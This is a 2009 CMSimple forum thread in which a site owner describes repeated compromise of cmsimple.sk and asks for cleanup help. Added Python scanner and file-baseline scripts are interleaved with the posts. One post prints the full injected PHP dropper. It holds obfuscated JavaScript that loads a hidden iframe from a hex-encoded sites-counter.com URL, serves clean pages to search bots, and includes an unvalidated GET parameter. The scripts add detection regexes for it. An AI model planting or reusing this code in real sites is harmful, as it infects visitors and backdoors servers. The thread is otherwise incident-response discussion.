cmsimple.sk: Google malware warning

A place for general not CMSimple related discussions
johnjdoe
Posts: 571
Joined: Tue May 20, 2008 6:32 am

cmsimple.sk: Google malware warning

Post by johnjdoe » Fri Oct 16, 2009 12:00 pm

Hi, did you see that Google gives a malware warning when accessing cmsimple.sk: "Warning - visiting this web site may harm your computer!"

Look here: http://www.google.com/interstitial?url= ... simple.sk/

@Tata: do you have an explanation for this?

Holger
Site Admin
Posts: 3470
Joined: Mon May 19, 2008 7:10 pm
Location: Hessen, Germany

Re: cmsimple.sk: Google malware warning

Post by Holger » Fri Oct 16, 2009 12:02 pm

Yes, I've informed him by PM yesterday and removed the link to his website in his profile.
He's working on that.

Holger

Tata
Posts: 3588
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia
Contact:

Re: cmsimple.sk: Google malware warning

Post by Tata » Fri Oct 16, 2009 5:19 pm

Hi, all!
I am slowly getting sick of the hackers. I got this warning three days ago. You remember these attacks a couple of months ago. Since then I immediately did everything you suggested and also followed all the recommendations found on the internet. I have:
  • reinstalled my PC from "0".
  • downloaded my entire webspace from the host and deleted my entire domain.
  • changed my FTP passwords.
  • detected all infected files - at the first attack they were only the index.php files, and they were actually not infected - only code with a link to infectious websites was inserted: in small files at their very end, in larger files somewhere in the middle, deleting the rest of them, so the pages were out of function.
  • cleaned (at this time over 5000!!! files) manually - damaged files were replaced by their originals, newly downloaded from CMSimplewiki or from the authors' websites.
  • uploaded everything back, CHMODed all index.php files (444) and had it checked by Google - no warnings.
About a week or two later a new attack came and all index.* files were manipulated. I uploaded everything again and CHMODed all index.* files. There were also some installations which I used as my online playgrounds. These were not infected and I had obviously overlooked their index.* files. These were manipulated this week. I can't understand how it is possible. There is not one file on my local server hosting this "IFRAME code". It also can't be found by any antivirus. But my PC is absolutely free, as far as one can rely on the antivirus, firewall and all other anti... software. (I run Windows 7, ESET Internet Security, Defender.)
This time only 47 index.php files were manipulated, which I had obviously overlooked when CHMODing. But they were also installations to which no one has access. Only I use them for my testing.
I asked Google to re-check the domain. Today (after 5 days!!!) I got the confirmation. But they avoided announcing when the domain will be checked and what the result will be.
Now I have checked the warning from FF at http://safebrowsing.clients.google.com/ ... simple.sk/ and it says:
What is the actual rank in the list for cmsimple.sk?
The site is listed among the suspicious sites - visiting this site may damage your PC.
During the last 90 days a part of this site was listed 1 time because of suspicious activity.
What happened when Google visited this site?
Of 24 pages tested on this site during the last 90 days, 15 pages caused download and installation of malicious software without the user's authorization....
Malicious software includes 33 trojan(s), 30 scripting exploit(s), 14 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software is hosted on 3 domains, including keymydomains.com/, ncenterpanel.cn/, sites-counter.com/.
This site was hosted on 1 network(s) including AS29208 (DIALTELECOM).
Does this site act as a source of further distribution of malicious software?
It seems that during the last 90 days the site cmsimple.sk has not acted as a source infecting any other sites.
Does this site host malicious software?
No, this site has hosted no malicious software in the last 90 days.
Anyway, after five days the domain is still inaccessible. But only in FF and Safari. There are no warnings in IE and GeBin9.

Help me please, what else shall I do?
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

Holger
Site Admin
Posts: 3470
Joined: Mon May 19, 2008 7:10 pm
Location: Hessen, Germany

Re: cmsimple.sk: Google malware warning

Post by Holger » Fri Oct 16, 2009 7:06 pm

Hi Tata,

at the moment your page is accessible with the latest FF and safe browsing enabled.
[OT]
With a look at the source code, I found 3 iframes:
two at the top (maybe a counter) and one other, pointing to e-katalog.sk:
http://safebrowsing.clients.google.com/ ... katalog.sk

You should remove all that unnecessary stuff.
[/OT]

Holger

Tata
Posts: 3588
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia
Contact:

Re: cmsimple.sk: Google malware warning

Post by Tata » Fri Oct 16, 2009 8:40 pm

I am out of power. I downloaded the domain again and checked it for any IFRAME available. Now I have found the IFRAME pointing to http:[slash/slash]ncenterpanel[dot]cn[slash]php[slash]p31[dot]php in the first line of:
cmsimple/index.php
plugins/index.php
Now I see that in almost every subdirectory there is an uploaded file with a randomly generated name like PEC6963F720301.php. How is it possible? What the hell shall I do now? The website is no longer accessible by any browser; even by IE it is not accessible. I am going to download the domain again and I am looking forward to a very creative night and weekend :twisted:
Here is the code of the files:

<?php

// Payload: obfuscated JavaScript that writes a hidden 1x1 iframe. The iframe
// src is rebuilt at runtime from a dot-separated hex string that is
// URL-unescaped and then reversed (see THAMWc / JSRJxVcV below).
$frame_code = '<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><script>/*_riRJopYA_uU*/var maSKFTfgzy=document;/*eNGUgQyproQjLwcwGxtLckVP*/function JSRJxVcV(iKGZa)/*fPxDyeN_cINKnEiaEijWSjbMQ*/{var sIBtuWphKVC = "",/*PTSzNTVJPPSZEgc*/ASksbIeCmKm=0;for(ASksbIeCmKm=iKGZa.length-1;ASksbIeCmKm >= 0;ASksbIeCmKm--)/*fkeWREfireemHjIDyyvaKLqMK*/{sIBtuWphKVC+=iKGZa.charAt(ASksbIeCmKm);}return sIBtuWphKVC;/*lQFLAvMavWhp*/}/*_riRJopYA_uU*/function THAMWc(Uf_hW)/*wvskgKquyCfDU_fNnzLh*/{/*asAYOrimRFaxNjr*/Uf_hW = Uf_hW.replace(/[\.]/g, "%");/*asAYOrimRFaxNjr*/Uf_hW=unescape(Uf_hW);/*OFYakHAvPHLmfLCLgYBuCu*/return JSRJxVcV(Uf_hW);/*YcHVPLpfsLmebZsoZxcXjR*/}/*RropemxIkeWaSKfJWl*/function KNxrQJJuJ(){/*PTSzNTVJPPSZEgc*/maSKFTfgzy.write("<style>.apcdqYgApH{width:1px;height:1px;border:none;visibility:hidden}</style>");/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/var thOySD="<iframe id=\"PzuNOYDH\" src=\"x\" class=\"apcdqYgApH\"></iframe>";/*wvskgKquyCfDU_fNnzLh*//*vFzsZkRJRqmDBwCtOax*/var zOHkNaBQqOk=thOySD.replace(/[\+x]/g,THAMWc(".70.68.70.2e.6e.69.2f.34.37.31.2f.72.65.73.75.2f.6d.6f.63.2e.72.65.74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68"));/*vFzsZkRJRqmDBwCtOax*//*PTSzNTVJPPSZEgc*/return zOHkNaBQqOk;/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/}/*fPxDyeN_cINKnEiaEijWSjbMQ*//*UACyjbdWJu*//*fPxDyeN_cINKnEiaEijWSjbMQ*//*gxmlpKbCEZYM*/maSKFTfgzy.writeln(KNxrQJJuJ());/*XOQoHXqCHdswYQ*//*RropemxIkeWaSKfJWl*//*lQFLAvMavWhp*/</script><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 -->';

// Resolve the directory of the requested file so that relative include()s
// inside it keep working when it is served through this wrapper.
function get_file_dir_($file) {
    global $argv;
    $dir = dirname(getcwd() . '/' . $file);
    $curDir = getcwd();
    @chdir($dir);
    $dir = getcwd();
    @chdir($curDir);
    return $dir;
}

// Search-engine crawlers get the untouched page, so the injection is hidden
// from the engines' indexes and only ordinary visitors receive the iframe.
function is_search_bot($agent)
{
    if(
        strstr($agent, "Yandex/") != null ||
        strstr($agent, "YaDirectBot") != null ||
        strstr($agent, "James Bond") != null ||
        strstr($agent, "Googlebot") != null ||
        strstr($agent, "Mediapartners-Google") != null ||
        strstr($agent, "StackRambler") != null ||
        strstr($agent, "Slurp") != null ||
        strstr($agent, "msnbot") != null
    )
    {
        return true;
    }
    return false;
}

// Output-buffer filter: first strips hidden iframes and ad-script blocks that
// other infections may have planted, then inserts $frame_code directly after
// the <body> tag (or appends it if there is no <body>) for every non-bot visitor.
function callback($data)
{
    global $frame_code;
    $data = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $data);
    $data = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $data);
    $data = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $data);
    if(is_search_bot($_SERVER['HTTP_USER_AGENT']) == true) {
        return $data;
    } else {
        if(preg_match("/(<body[^>]*>)/i", $data) > 0) {
            return preg_replace("/(<body[^>]*>)/i", "$1 \n".$frame_code, $data, 1);
        }
        else {
            return $data.$frame_code;
        }
    }
}

// Entry point: serve whatever file ?qq= names through the filter above
// (include() of an unvalidated GET parameter); if output buffering cannot be
// started, just emit the payload by itself.
if(@ob_start('callback') == true) {
    $file = $_GET['qq'];
    @chdir(get_file_dir_($file));
    include($file);
} else {
    echo $frame_code;
}
?>
Last edited by Tata on Sun Oct 18, 2009 8:53 am, edited 1 time in total.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

CMSimple-Styles.com
Posts: 342
Joined: Thu Jun 26, 2008 8:19 pm
Location: Germany
Contact:

Re: cmsimple.sk: Google malware warning

Post by CMSimple-Styles.com » Sat Oct 17, 2009 1:09 am

Do you have global variables enabled? You can do a batch removal; there is no need to go through the files manually. I have done this for someone else who also got hacked with Dreamweaver.

Tata
Posts: 3588
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia
Contact:

Re: cmsimple.sk: Google malware warning

Post by Tata » Sat Oct 17, 2009 6:21 am

CMSimple-Styles.com wrote:Do you have global variables enabled?
I think I do. I have the phpinfo.php file on the server, but I can't run it right now. It is 8:12 AM and I have been sitting here since my last post yesterday. Everything was cleaned and uploaded back, all indexes were closed with 444. Then the FTP password was checked and everything searched again, and the damned files like PEO123456879.php were back again.
The cleaning is not that difficult. I simply search the localhost for all index.* files. Then I open them in Notepad++. There I search e.g. for any IFRAME and check the found files for malicious links.
Or I search the localhost for any file containing the string ":8080" which is used in those links.
But if you have the batch file stored somewhere, I'll try this too. But now I will finally need to take a nap. My domain is no longer available in any browser... WHY EXACTLY MINE? I have about 20 other websites on the same ISP server. Only 2 of them were compromised. I don't understand this.
Good night, friends :-(
Good morning again!
Can't sleep. I recently deleted all those dummy files from the server. Now I checked it again and the files are there again. I need to contact my ISP about this.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
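The following is an added example and not code from the thread or from CMSimple: a scanner that finds the injection Tata posted above (the marker-comment-wrapped script, the dot-separated hex iframe target, the ob_start()/include($_GET['qq']) dropper) and strips it in batch, as CMSimple-Styles.com suggested instead of opening every index.* file in Notepad++. The decoding step reproduces exactly what the posted THAMWc() does (replace "." with "%", URL-unescape, reverse), and on the hex string from the posted sample it yields a URL on sites-counter.com, one of the three domains named in the Google report above. The sample site, the tree layout and the PE…php name pattern are constructed here and are assumptions.

```python
"""Scan a CMSimple webroot for the injected iframe script and the dropper,
then remove the injection in batch.  Sample files below are constructed."""
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Encoded iframe target exactly as it appears in the posted $frame_code.
HEX_BLOB = (".70.68.70.2e.6e.69.2f.34.37.31.2f.72.65.73.75.2f.6d.6f.63.2e.72.65"
            ".74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68")

# Injected block: random-word HTML comment, <script>...</script>, closing comment.
MARKER_RE = re.compile(r"<!-- [\w ]+ -->\s*<script>.*?</script>\s*<!-- [\w ]+ -->", re.S)
# Quoted run of dot-separated hex bytes (the argument of THAMWc() in the sample).
DOTTED_HEX_RE = re.compile(r'"((?:\.[0-9a-fA-F]{2}){8,})"')
# Dropper signature: ob_start() output filter plus include() of ?qq=<file>.
BACKDOOR_RE = re.compile(r"ob_start\('callback'\).*?\$_GET\['qq'\].*?include\(\$file\)", re.S)
# Dropped files named like PEC6963F720301.php (assumed pattern).
DROPPED_NAME_RE = re.compile(r"^PE[0-9A-Z]{10,}\.php$")


def decode_dotted_hex(blob: str) -> str:
    """Undo THAMWc() from the sample: '.' -> '%', URL-unescape, reverse."""
    return unquote(blob.replace(".", "%"))[::-1]


def scan_text(text: str) -> dict:
    """What the scanner sees in one file's contents."""
    return {
        "injected_script": MARKER_RE.search(text) is not None,
        "iframe_targets": [decode_dotted_hex(b) for b in DOTTED_HEX_RE.findall(text)],
        "backdoor": BACKDOOR_RE.search(text) is not None,
    }


def clean_text(text: str) -> str:
    """Batch removal: drop every injected block, leave everything else as is."""
    return MARKER_RE.sub("", text)


def scan_tree(root) -> list:
    """Walk a webroot; return (relative path, kind, detail) tuples."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if DROPPED_NAME_RE.match(path.name):
            findings.append((rel, "dropped-file-name", path.name))
        if path.suffix.lower() not in {".php", ".htm", ".html", ".js"}:
            continue
        result = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if result["backdoor"]:
            findings.append((rel, "backdoor", "ob_start filter + include($_GET['qq'])"))
        if result["injected_script"]:
            findings.append((rel, "injected-script", ", ".join(result["iframe_targets"]) or "?"))
    return findings


# --- constructed sample site (not real files from cmsimple.sk) ---------------
INFECTED_INDEX = (
    "<?php include('cmsimple/cms.php'); ?>\n<html><body>\n"
    "<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><script>"
    'document.write("<iframe src=\\"" + THAMWc("' + HEX_BLOB + '") + "\\"></iframe>");'
    "</script><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 -->\n</body></html>\n"
)
DROPPED_BACKDOOR = (
    "<?php\n$frame_code = '<script>/* payload */</script>';\n"
    "function callback($data) { global $frame_code; return $data.$frame_code; }\n"
    "if(@ob_start('callback') == true) { $file = $_GET['qq']; include($file); }\n?>\n"
)
CLEAN_PHP = "<?php echo 'clean'; ?>\n"


def build_sample_site(root) -> None:
    root = Path(root)
    files = {"index.php": INFECTED_INDEX, "cmsimple/index.php": INFECTED_INDEX,
             "plugins/index.php": CLEAN_PHP, "plugins/PEC6963F720301.php": DROPPED_BACKDOOR,
             "content/content.htm": "<h1>Clean page</h1>\n"}
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body, encoding="utf-8")


def run_demo() -> tuple:
    """Build the sample, scan, clean in place, rescan; return both scans."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        before = scan_tree(tmp)
        for rel, kind, _ in before:
            p = Path(tmp) / rel
            if kind == "injected-script":
                p.write_text(clean_text(p.read_text(encoding="utf-8")), encoding="utf-8")
            elif kind in ("backdoor", "dropped-file-name") and p.exists():
                p.unlink()  # dropped files are deleted outright, not cleaned
        after = scan_tree(tmp)
    return before, after


if __name__ == "__main__":
    found, left = run_demo()
    for f in found:
        print("found:", *f)
    print("after cleanup:", left)
```

Run it against a downloaded copy of the webspace rather than the live server, and keep the "before" list: the decoded iframe targets and the dropped file names are what the ISP and Google need to see. The signatures are specific to this sample; an infection with different markers needs the regexes adjusted, which is why the tree-wide baseline check below is the more durable control.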

Gert
Posts: 3078
Joined: Fri May 30, 2008 4:53 pm
Location: Berlin
Contact:

Re: cmsimple.sk: Google malware warning

Post by Gert » Sat Oct 17, 2009 9:04 am

Hallo Tata,

I recommend using cmsimple.sk for your cmsimple.sk website only. This domain is an "official" domain of CMSimple. If there is no more than 1 installation of CMSimple, it is easier to keep under control.

For playgrounds better use another (less important) domain.
Gert Ebersbach | CMSimple | Templates - Plugins - Services

Tata
Posts: 3588
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia
Contact:

Re: cmsimple.sk: Google malware warning

Post by Tata » Sat Oct 17, 2009 1:07 pm

It seems I am really forced to do it this way. I have already reduced all my "playgrounds" to 3, which are not big at all. We will see how it goes. I cleaned everything I found. But the website is still not accessible.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

Tata
Posts: 3588
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia
Contact:

Re: cmsimple.sk: Google malware warning

Post by Tata » Sun Oct 18, 2009 9:00 am

Everything seems to be OK again so far. At this point I would like to know whether it wouldn't be good to use stricter CHMOD settings for the installation and have all possible directories and files set to read-only. Actually there are many of them for which this setting would be absolutely sufficient. Or maybe some general .htaccess file taking care of this.
Thank you for all your hints and support.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
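As an added example for the CHMOD question above (not code from the thread or from CMSimple): a baseline-and-verify check that records a SHA-256 and the mode bits of every file in the webroot, locks files outside the directories the CMS must write at runtime to 444 (Tata's own setting for index.php), and later reports added, removed, modified and unexpectedly writable files. The point it demonstrates is the caveat behind read-only modes: a process running as the same account that owns the files, whether the compromised PHP or the FTP login, can chmod them back and write again, so the mode alone stops nothing, while the diff against a baseline stored off the server reliably shows the reinfection. The names in WRITABLE_DIRS, the sample tree and the simulated attacker are assumptions.

```python
"""Baseline / verify a webroot: file hashes plus mode bits.  Sample tree and
the simulated reinfection are constructed for the demo."""
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# Directories the CMS legitimately writes at runtime (assumption; adjust to
# the installation).  Every file elsewhere is expected to be static.
WRITABLE_DIRS = {"content", "images", "downloads"}
READ_ONLY = 0o444


def file_record(path: Path) -> dict:
    """Content hash and permission bits of one regular file."""
    st = path.lstat()
    return {"sha256": hashlib.sha256(path.read_bytes()).hexdigest(),
            "mode": stat.S_IMODE(st.st_mode)}


def build_baseline(root) -> dict:
    """relative path -> record, for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): file_record(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def lock_down(root) -> list:
    """chmod 444 every file outside WRITABLE_DIRS; return the paths changed."""
    root = Path(root)
    changed = []
    for rel in build_baseline(root):
        if rel.split("/", 1)[0] not in WRITABLE_DIRS:
            os.chmod(root / rel, READ_ONLY)
            changed.append(rel)
    return changed


def verify(root, baseline: dict) -> dict:
    """Diff the current tree against a saved baseline."""
    current = build_baseline(root)
    report = {"added": [], "removed": [], "modified": [], "writable": []}
    for rel in sorted(set(current) | set(baseline)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in current:
            report["removed"].append(rel)
        elif current[rel]["sha256"] != baseline[rel]["sha256"]:
            report["modified"].append(rel)
    for rel, rec in current.items():
        # Any write bit on a file that should be static is itself a finding:
        # either the lock-down was incomplete or somebody flipped it back.
        if rel.split("/", 1)[0] not in WRITABLE_DIRS and rec["mode"] & 0o222:
            report["writable"].append(rel)
    return report


def run_demo() -> dict:
    """Clean install -> baseline -> lock down -> simulated reinfection -> verify."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        sample = {"index.php": "<?php include('cmsimple/cms.php'); ?>\n",
                  "cmsimple/index.php": "<?php /* stub */ ?>\n",
                  "content/content.htm": "<h1>Hello</h1>\n"}
        for rel, body in sample.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body, encoding="utf-8")
        baseline = build_baseline(root)   # in practice: store this off the webroot
        lock_down(root)

        # Simulated attacker running as the file owner (constructed): undo the
        # 444, append a hidden iframe, drop a random-named PHP file.
        target = root / "cmsimple/index.php"
        os.chmod(target, 0o644)
        with target.open("a", encoding="utf-8") as fh:
            fh.write('<iframe src="x" style="visibility:hidden"></iframe>\n')
        (root / "plugins").mkdir()
        (root / "plugins/PEC6963F720301.php").write_text("<?php /* dropped */ ?>\n",
                                                         encoding="utf-8")
        return verify(root, baseline)


if __name__ == "__main__":
    for kind, paths in run_demo().items():
        print(f"{kind:9}: {paths}")
```

Run build_baseline() right after a clean upload and keep its output somewhere the web server and FTP account cannot reach; then run verify() from cron or by hand after each upload. Directories are left at their existing mode here on purpose: making them 555 would also stop the CMS from creating its own files, and the per-file check already tells you when something static became writable.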
